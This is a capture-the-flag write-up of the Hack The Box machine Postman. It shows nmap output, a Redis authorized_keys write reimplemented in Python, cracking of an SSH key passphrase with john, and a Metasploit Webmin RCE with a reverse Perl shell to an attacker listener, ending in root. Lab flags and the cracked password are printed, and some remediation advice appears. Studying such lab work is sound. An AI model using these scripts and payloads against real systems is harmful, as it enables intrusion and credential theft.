```
kali@kali:~$ nmap -A -Pn -T4 -p- 10.10.10.160
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 23:18 EST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.34s latency).
Not shown: 65531 filtered ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-server-header: MiniServ/1.910
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
The ports worth a closer look are 80, 6379 and 10000.

Port 80:

Port 6379:

Port 10000:
The site on port 80 usually has nothing worth exploiting, and trying weak credentials against the Webmin service on port 10000 went nowhere. Redis, however, is exposed on 6379 and answers without authentication, so that is the place to start. Googling "redis key store 4.0.9 exploit" turns up the exploit script used below; only the tail of the script survives on this page (Python 2):

```
    except:
        print "Something went wrong"
else:
    print colored("\tRedis-cli:::::This utility is not present on your system. You need to install it to proceed further.", "red")
```
```
SSH Keys Need to be Generated
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa.
Your public key has been saved in /home/kali/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:wMzHMZr3ew4dVP3cXrwsWg7JF7ay4peQHLplhK7BDww acid_creative
The key's randomart image is:
+---[RSA 3072]----+
|      o ..       |
|     + + o .    .|
|      B =   . oo |
|     E = +   . o*|
|    + . S = + +.o|
|     = o * B * o.|
|      = + + % .  |
|     . o . O .   |
|      ..o .      |
+----[SHA256]-----+
Keys Generated Successfully
OK
OK
OK
(error) ERR Changing directory: No such file or directory
OK
OK
You'll get shell in sometime..Thanks for your patience
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Feb 10 08:46:56 2020 from 10.10.15.125
redis@Postman:~$ pwd
/var/lib/redis
```
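What the script automates is a well-known sequence: store the attacker's public key as a Redis value, point `dir` at the redis user's `.ssh` directory, set `dbfilename` to `authorized_keys`, and `SAVE` so the RDB dump is written out as a key file that sshd will accept. The following is an added example that reimplements that sequence over raw RESP so every command and reply is visible; it is not the page's redis.py and nothing in it comes from the target. The target address, the `crackit` key name, the `/var/lib/redis` home (matching the `pwd` output above) and a pre-existing `.ssh` directory are assumptions, and the technique only works because this instance accepts commands without AUTH and has not renamed CONFIG.

```python
"""Redis -> authorized_keys write over raw RESP (added example, see lead-in)."""
import socket

# Constructed sample key, not real key material and not the key used on the page.
SAMPLE_PUBKEY = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDconstructedSampleKeyMaterial kali@kali"


def resp(*args: bytes) -> bytes:
    """Encode one command as a RESP array, the wire format redis-cli uses."""
    out = b"*%d\r\n" % len(args)
    for a in args:
        out += b"$%d\r\n%s\r\n" % (len(a), a)
    return out


def padded_key(pubkey: str) -> bytes:
    """SAVE writes an RDB file: binary header, our value, binary trailer. sshd reads
    authorized_keys line by line and skips lines it cannot parse, so blank lines on
    both sides isolate the key from the RDB bytes."""
    return b"\n\n" + pubkey.strip().encode() + b"\n\n"


def plan(pubkey: str, home: str = "/var/lib/redis", key: str = "crackit",
         flush: bool = False) -> list:
    """Command sequence. The public scripts start with FLUSHALL so the dump holds only
    the key; that destroys the target's data, so it is opt-in here."""
    cmds = [resp(b"FLUSHALL")] if flush else []
    cmds += [
        resp(b"SET", key.encode(), padded_key(pubkey)),
        resp(b"CONFIG", b"SET", b"dir", f"{home}/.ssh".encode()),  # dir must already exist
        resp(b"CONFIG", b"SET", b"dbfilename", b"authorized_keys"),
        resp(b"SAVE"),
    ]
    return cmds


def cleanup_plan(home: str = "/var/lib/redis") -> list:
    """Restore the Ubuntu package defaults (assumed) so normal persistence keeps working.
    The authorized_keys file itself has to be removed over SSH afterwards."""
    return [
        resp(b"CONFIG", b"SET", b"dir", home.encode()),
        resp(b"CONFIG", b"SET", b"dbfilename", b"dump.rdb"),
    ]


def parse_reply(raw: bytes) -> tuple:
    """Classify a RESP simple reply: +OK or -ERR ..., what redis-cli prints as OK / (error)."""
    line = raw.split(b"\r\n", 1)[0]
    if line.startswith(b"+"):
        return ("ok", line[1:].decode())
    if line.startswith(b"-"):
        return ("error", line[1:].decode())
    return ("other", line.decode(errors="replace"))


def run(host: str, port: int, cmds: list, timeout: float = 5.0) -> list:
    """Send the commands one at a time and stop at the first error: a failed
    CONFIG SET dir means SAVE would write the dump into the previous directory."""
    results = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        for c in cmds:
            s.sendall(c)
            status, text = parse_reply(s.recv(4096))
            results.append((status, text))
            if status == "error":
                break
    return results


if __name__ == "__main__":
    for status, text in run("10.10.10.160", 6379, plan(SAMPLE_PUBKEY)):
        print(status, text)
```

The `(error) ERR Changing directory: No such file or directory` line in the run above is exactly what `CONFIG SET dir` returns when the directory is missing; Redis will not create it, so a script that ignores that reply ends up saving the dump into the old `dir`. On the defensive side, the fix for this class of exposure is `bind 127.0.0.1` plus `requirepass`, and `rename-command CONFIG ""` (protected-mode alone stops applying once `bind` has been widened).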
```
kali@kali:~/Desktop$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa)
1g 0:00:00:35 DONE (2020-02-10 04:28) 0.02844g/s 408014p/s 408014c/s 408014C/s a6_123..*7¡Vamos!
Session completed
```
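The two "Cost" lines explain why rockyou went through at roughly 400k candidates per second: Cost 1 = 1 means the key is in the legacy PEM format protected with MD5/3DES (OpenSSL's EVP_BytesToKey), and Cost 2 = 2 means each guess costs just two MD5 calls. The following added example (stdlib only, not from the page) inspects a private key and reports those parameters for both the legacy format and the current openssh-key-v1 format with bcrypt rounds; the two sample keys are constructed headers with no real key material, and the field layout assumed for openssh-key-v1 is the one documented in OpenSSH's PROTOCOL.key.

```python
"""Inspect an encrypted OpenSSH private key and explain john's cost numbers
(added example, see lead-in). Stdlib only; sample keys are constructed."""
import base64
import hashlib
import struct


def _pem_body(pem: str) -> tuple:
    """Split PEM into RFC 1421 headers (legacy format only) and the decoded body."""
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    lines = [ln for ln in lines if ln and not ln.startswith("-----")]
    headers = {}
    while lines and ":" in lines[0]:
        k, v = lines.pop(0).split(":", 1)
        headers[k.strip()] = v.strip()
    return headers, base64.b64decode("".join(lines))


def _read_string(buf: bytes, off: int) -> tuple:
    """SSH wire 'string': 4-byte big-endian length, then the bytes."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def _ssh_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


# OpenSSL's EVP_BytesToKey, the KDF behind "Proc-Type: 4,ENCRYPTED" keys: repeated MD5
# until enough key bytes exist. For DES-EDE3 (24 bytes) that is two MD5 calls per
# guess, which john reports as "iteration count 2".
def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int) -> bytes:
    out = prev = b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + password + salt).digest()
        out += prev
    return out[:key_len]


def evp_bytes_to_key_blocks(key_len: int) -> int:
    return -(-key_len // hashlib.md5().digest_size)


LEGACY_KEYLEN = {"DES-EDE3-CBC": 24, "AES-128-CBC": 16, "AES-192-CBC": 24, "AES-256-CBC": 32}


def describe_key(pem: str) -> dict:
    headers, body = _pem_body(pem)
    if body.startswith(b"openssh-key-v1\x00"):
        off = len(b"openssh-key-v1\x00")
        cipher, off = _read_string(body, off)
        kdf, off = _read_string(body, off)
        kdfopts, off = _read_string(body, off)
        rounds = None
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o)
        return {"format": "openssh-key-v1", "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds}
    if "DEK-Info" in headers:
        cipher, iv_hex = headers["DEK-Info"].split(",")
        return {"format": "legacy-pem", "cipher": cipher, "kdf": "EVP_BytesToKey(MD5)",
                "salt": bytes.fromhex(iv_hex)[:8],  # PEM uses the first 8 IV bytes as salt
                "md5_blocks": evp_bytes_to_key_blocks(LEGACY_KEYLEN[cipher])}
    return {"format": "legacy-pem", "cipher": None, "kdf": None}


def hardening_advice(desc: dict) -> str:
    """How to re-protect a key whose passphrase can be guessed this cheaply."""
    if desc["format"] == "legacy-pem" or (desc.get("rounds") or 0) < 16:
        return "ssh-keygen -p -o -a 100 -f <keyfile>   # new format, bcrypt, 100 rounds"
    return "bcrypt with %d rounds; keep it" % desc["rounds"]


def _pem(label: str, body: bytes, headers: str = "") -> str:
    b64 = base64.b64encode(body).decode()
    lines = [b64[i:i + 70] for i in range(0, len(b64), 70)]
    return "-----BEGIN %s-----\n%s%s\n-----END %s-----\n" % (label, headers, "\n".join(lines), label)


# Constructed samples: headers only, no key material.
LEGACY_SAMPLE = _pem("RSA PRIVATE KEY", b"constructed body, not key material",
                     "Proc-Type: 4,ENCRYPTED\nDEK-Info: DES-EDE3-CBC,0123456789ABCDEF\n\n")
MODERN_SAMPLE = _pem("OPENSSH PRIVATE KEY",
                     b"openssh-key-v1\x00" + _ssh_string(b"aes256-ctr") + _ssh_string(b"bcrypt")
                     + _ssh_string(_ssh_string(b"\x00" * 16) + struct.pack(">I", 16))
                     + struct.pack(">I", 1))

if __name__ == "__main__":
    for sample in (LEGACY_SAMPLE, MODERN_SAMPLE):
        d = describe_key(sample)
        print(d, "->", hardening_advice(d))
```

A legacy-format key is therefore only as strong as the passphrase itself, which is why a wordlist hit like computer2008 comes back in 35 seconds; re-encrypting with `ssh-keygen -p -o -a 100` moves the key to bcrypt with a tunable work factor.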
The cracked passphrase also works as Matt's system password. Switch to Matt and read user.txt:
```
redis@Postman:~$ su Matt
Password:
Matt@Postman:/var/lib/redis$ cd /home/Matt/
Matt@Postman:~$ cat user.txt
517ad0ec2458ca97af8d93aac08a2f3c
```
```
Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   computer2008     yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.160     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME   Matt             yes       Webmin Username
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.4       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910

msf5 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 10.10.14.113:4444
[+] Session cookie: ba61f4eadcffcce039b166a29defa004
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.113:4444 -> 10.10.10.160:46990) at 2019-12-24 17:43:52 -0500

cat /root/root.txt
a257741[-----------------]ddce
```
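The webmin_packageup_rce module exploits the authenticated Package Updates command injection in Webmin up to 1.910, so it is only usable because Matt's passphrase was reused for Webmin; the "Session cookie" line is the module logging in before it fires the payload. The following added example (not from the page or from the Metasploit module) reproduces just that first step: authenticate with the recovered credentials and capture the `sid` cookie, which is the quickest way to confirm credential reuse against Webmin without running the RCE. Assumptions: Webmin listens with SSL on 10000 behind a self-signed MiniServ certificate, and its `session_login.cgi` takes the form fields `page`, `user` and `pass` and requires a `testing=1` cookie.

```python
"""Confirm reused credentials against Webmin's session login (added example, see lead-in)."""
import http.client
import ssl
import urllib.parse
from http.cookies import SimpleCookie
from typing import Optional

LOGIN_PATH = "/session_login.cgi"  # assumption: Webmin 1.910 login endpoint


def login_request(user: str, password: str, page: str = "/") -> tuple:
    """Build the POST Webmin's login form submits, returned as (path, body, headers)
    so it can be inspected or replayed without a live target."""
    body = urllib.parse.urlencode({"page": page, "user": user, "pass": password})
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "testing=1",  # Webmin rejects logins from clients that send no cookies
    }
    return LOGIN_PATH, body, headers


def extract_sid(set_cookie_headers: list) -> Optional[str]:
    """Pick the sid value out of the Set-Cookie headers. None means the login failed:
    Webmin answers a bad password with the login page again and sets no sid."""
    for raw in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(raw)
        if "sid" in jar:
            return jar["sid"].value
    return None


def webmin_login(host: str, port: int, user: str, password: str,
                 timeout: float = 10.0) -> dict:
    """POST the credentials over TLS and report whether a session was issued."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # self-signed MiniServ certificate (assumption)
    ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, context=ctx, timeout=timeout)
    path, body, headers = login_request(user, password)
    conn.request("POST", path, body=body, headers=headers)
    resp = conn.getresponse()
    resp.read()
    # get_all keeps multiple Set-Cookie headers apart; getheader would join them.
    sid = extract_sid(resp.headers.get_all("Set-Cookie") or [])
    conn.close()
    return {"status": resp.status, "sid": sid, "authenticated": sid is not None}


if __name__ == "__main__":
    # Credentials as recovered above: the SSH key passphrase reused for Webmin.
    print(webmin_login("10.10.10.160", 10000, "Matt", "computer2008"))
```

A non-None `sid` is the same cookie the module prints, and from that point the package-updates injection itself needs nothing more than an authenticated session, which is why a single reused passphrase takes this box from a Redis misconfiguration to root.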